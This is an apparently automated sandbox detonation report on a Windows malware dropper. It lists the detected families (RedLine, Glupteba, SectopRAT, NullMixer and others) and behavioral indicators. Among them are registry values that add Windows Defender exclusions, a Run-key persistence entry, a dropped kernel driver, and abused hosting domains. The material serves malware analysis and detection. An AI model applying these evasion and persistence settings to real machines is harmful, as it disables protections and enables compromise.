Analysis Overview
SHA256
ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f
Threat Level: Known bad
The file ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f was found to be: Known bad.
Malicious Activity Summary
SectopRAT payload
PrivateLoader
Glupteba
Fabookie family
SectopRAT
Socelars family
Nullmixer family
Sectoprat family
Privateloader family
Detect Fabookie payload
RedLine payload
Redline family
Fabookie
Glupteba family
NullMixer
RedLine
Windows security bypass
Socelars payload
Socelars
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
ASPack v2.12-2.42
Executes dropped EXE
Windows security modification
Checks computer location settings
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Manipulates WinMonFS driver.
Checks installed software on the system
Looks up geolocation information via web service
Looks up external IP address via web service
Manipulates WinMon driver.
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Program crash
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-09 21:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 21:27
Reported
2024-11-09 21:30
Platform
win7-20241023-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrimsonSnow = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1996 set thread context of 2924 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe |
| PID 1384 set thread context of 2884 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe |
| PID 1416 set thread context of 3044 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-5Q2U2.tmp | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259443562 | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.sfx.exe | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\gimagex.exe | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-3NF46.tmp | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-7MSSK.tmp | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Gparted\Build.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\gimagex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\YFBh.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
